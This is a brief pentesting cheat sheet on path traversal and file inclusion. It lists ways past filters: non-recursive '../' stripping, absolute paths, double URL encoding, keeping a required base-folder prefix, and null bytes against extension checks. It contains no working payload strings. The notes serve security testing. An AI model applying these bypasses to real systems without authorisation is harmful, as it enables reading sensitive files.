Path Traversal / File Inclusion
Path Traversal / Directory Traversal
No input validation
Non-Recursive filtering bypass
app is filtering "../"
Absolute Path Bypass
Encoding bypass
try double encoding the "/"
URL encode the "/" then URL encode every character
URL encode the "/" then URL encode the result
Burpsuite pro include a Path Traversal fuzzing wordlist.
Validation of starting path bypass
Sometimes the application requires that the supplied filename begins with a base folder. We can include this base folder and add in the traversal sequences after it.
File extension validation bypass
If app verifying the path must end with a certain file extension, try null byte
Resources
Last updated
